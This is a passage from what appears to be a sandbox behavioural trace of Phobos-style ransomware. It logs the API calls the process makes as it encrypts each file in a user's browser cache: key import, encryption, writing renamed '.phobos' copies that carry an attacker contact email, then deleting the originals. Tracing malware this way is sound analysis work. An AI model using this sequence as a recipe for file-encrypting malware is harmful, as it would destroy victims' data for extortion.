HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.958] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=300) returned 1 [0176.958] CloseHandle (hObject=0x14c) returned 1 [0176.958] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png")) returned 0x2020 [0176.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.959] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.959] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.960] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0176.960] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.960] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12c, lpOverlapped=0x0) returned 1 [0176.966] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0176.966] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0176.967] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.967] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.967] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.967] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.967] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.967] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.967] CloseHandle (hObject=0x14c) returned 1 [0176.967] CloseHandle (hObject=0x178) returned 1 [0176.967] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png")) returned 1 [0176.968] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.969] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=913) returned 1 [0176.969] CloseHandle (hObject=0x178) returned 1 [0176.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png")) returned 0x2020 [0176.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.969] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.969] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.970] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0176.970] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.970] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x391, lpOverlapped=0x0) returned 1 [0176.993] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3a0, dwBufLen=0x3a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3a0) returned 1 [0176.993] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3a0, lpOverlapped=0x0) returned 1 [0176.994] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.994] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.994] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.994] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.994] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.994] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.994] CloseHandle (hObject=0x178) returned 1 [0176.994] CloseHandle (hObject=0x14c) returned 1 [0176.994] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aani8qk[1].png")) returned 1 [0176.995] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.998] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=31314) returned 1 [0176.998] CloseHandle (hObject=0x14c) returned 1 [0176.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js")) returned 0x2020 [0176.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.998] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.998] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.999] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0176.999] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.999] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7a52, lpOverlapped=0x0) returned 1 [0177.265] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7a60, dwBufLen=0x7a60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7a60) returned 1 [0177.266] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7a60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7a60, lpOverlapped=0x0) returned 1 [0177.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0177.267] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.267] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.267] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.267] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.268] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.268] CloseHandle (hObject=0x14c) returned 1 [0177.268] CloseHandle (hObject=0x178) returned 1 [0177.268] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\adition[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\adition[1].js")) returned 1 [0177.270] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.271] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=24555) returned 1 [0177.271] CloseHandle (hObject=0x178) returned 1 [0177.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg")) returned 0x2020 [0177.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.271] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.271] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.272] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.272] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.272] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5feb, lpOverlapped=0x0) returned 1 [0177.331] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5ff0, dwBufLen=0x5ff0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5ff0) returned 1 [0177.331] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5ff0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5ff0, lpOverlapped=0x0) returned 1 [0177.332] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0177.332] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.332] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80, dwBufLen=0x80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80) returned 1 [0177.332] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.332] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x132, lpOverlapped=0x0) returned 1 [0177.332] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.332] CloseHandle (hObject=0x178) returned 1 [0177.332] CloseHandle (hObject=0x14c) returned 1 [0177.333] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg")) returned 1 [0177.334] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.334] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=426) returned 1 [0177.334] CloseHandle (hObject=0x14c) returned 1 [0177.334] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png")) returned 0x2020 [0177.334] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.334] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.334] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.335] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: 